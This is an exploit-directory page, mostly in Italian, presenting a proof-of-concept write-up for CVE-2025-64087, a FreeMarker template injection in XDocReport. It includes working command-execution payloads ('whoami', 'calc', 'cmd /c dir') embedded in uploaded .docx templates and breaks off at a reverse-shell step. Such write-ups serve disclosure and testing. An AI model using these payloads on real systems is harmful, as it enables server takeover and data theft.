Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-64087-SSTI- — CVE-2025-64087 (SSTI) | Kitploit
Strumenti/GitHubGitHub/at190510-cuong/cve-2025-64087-ssti-
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo Payload
GitHubat190510-cuong/cve-2025-64087-ssti-

CVE-2025-64087-SSTI-

CVE-2025-64087 (SSTI)

Vedi Repository
1156 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-64087 (SSTI FreeMarker)

Server-Side Template Injection (SSTI) in XDocReport allows Remote Code Execution via Apache FreeMarker engine

Bug Definition

Panoramica della vulnerabilità

  • Server-Side Template Injection (SSTI) è una vulnerabilità di sicurezza web che consente a un attaccante di iniettare codice malevolo nei template utilizzati da sistemi di gestione dei contenuti (CMS) e framework web, al fine di eseguire attacchi remoti, ottenere informazioni sensibili o condurre attività di intrusione nel sistema.

  • SSTI è una variante delle vulnerabilità di Injection (come SQL Injection, XSS, ecc.), in cui un hacker sfrutta l'uso di sistemi di template per distribuire codice malevolo da remoto. Quando un attacco SSTI ha successo, l'attaccante può eseguire il proprio codice sul server lato server, permettendogli di eseguire attacchi remoti, come la raccolta di informazioni sensibili, lo svolgimento di attività di intrusione nel sistema e l'accesso a risorse non autorizzate.

  • La vulnerabilità SSTI si verifica spesso a causa dell'uso di sistemi di template non sicuri o della mancata verifica e gestione dei parametri di input prima di inserirli nei template. Se un attacco SSTI ha successo, le conseguenze possono essere gravi e causare danni significativi all'organizzazione colpita.

Impatto commerciale

  • La vulnerabilità SSTI può causare diverse conseguenze gravi, tra cui:

  • Esecuzione di codice malevolo: Un attaccante può sfruttare questa vulnerabilità per eseguire codice malevolo sul server, consentendo di rubare dati, compiere azioni illegali sul sistema o persino prendere il controllo completo del server.

  • Divulgazione di informazioni sensibili: SSTI può consentire a un attaccante di leggere, modificare o cancellare file sul server. Se questi file contengono informazioni sensibili, come account e password, l'attaccante può facilmente divulgarle.

  • Attacchi di minaccia o phishing agli utenti: Un attaccante può utilizzare SSTI per eseguire attacchi di minaccia o phishing agli utenti, modificando il contenuto del sito web o aggiungendo pulsanti falsi. Se l'utente clicca su questi pulsanti, l'attaccante può rubare informazioni dell'utente o installare software dannoso sul suo computer.

Severity: CRITICAL

image

Description and Impact

A Server-Side Template Injection (SSTI) vulnerability was found in OpenSAGRES XDocReport when processing DOCX templates with the FreeMarker engine. Under certain configurations, crafted templates can lead to Remote Code Execution (RCE).

Il sito web di gestione delle risorse umane consente agli utenti di caricare file .docx sul sistema. Durante l'elaborazione, l'applicazione utilizza il motore di template FreeMarker (nel file FreemarkerTemplateEngine.java) per renderizzare il contenuto ${"freemarker.template.utility.Execute"?new()("whoami")} senza alcun meccanismo di controllo o filtro del contenuto in input. Questa vulnerabilità permette a un attaccante di iniettare espressioni malevole nel file .docx (template), portando a Remote Code Execution (RCE) sul server e può essere sfruttata per rubare informazioni o prendere il controllo del sistema.

Affected component

fr.opensagres.xdocreport.template.freemarker — XDocReport (versions 1.0.0 through 2.1.0).

Root cause analysis

  • Nel file https://github.com/opensagres/xdocreport/blob/master/template/fr.opensagres.xdocreport.template.freemarker/src/main/java/fr/opensagres/xdocreport/template/freemarker/FreemarkerTemplateEngine.java non viene eseguita alcuna verifica del contenuto del file xdoc in input. Il contenuto del template viene caricato direttamente e passato a process(context, writer, template) per essere elaborato dal motore FreeMarker senza alcun meccanismo di sandboxing o limitazione di direttive/espressioni. Di conseguenza, un attaccante può fornire un template contenente espressioni/istruzioni FreeMarker malevole, portando all'esecuzione di codice remoto (RCE).

image

Step to reproduce

  1. L'utente carica un file .docx il cui contenuto è il seguente payload:``` ${"freemarker.template.utility.Execute"?new()("calc")}
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

2. Si vede che può essere eseguito con successo e apre l'applicazione calc

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

3. Allo stesso modo, per ottenere le informazioni dell'utente in esecuzione sul sistema con il payload:```
${"freemarker.template.utility.Execute"?new()("whoami")}

image

image

  1. Si può notare che il file .docx, dopo l'elaborazione da parte del template engine, ha restituito i dati del sistema.

image

  1. Analogamente con il seguente payload:``` ${"freemarker.template.utility.Execute"?new()("cmd /c dir d:")}
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

6. Aumentare l'impatto a RCE

- La macchina in ascolto è wsl con indirizzo IP `172.26.208.130`

![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

- sfruttare con il seguente payload:
Scarica lo strumento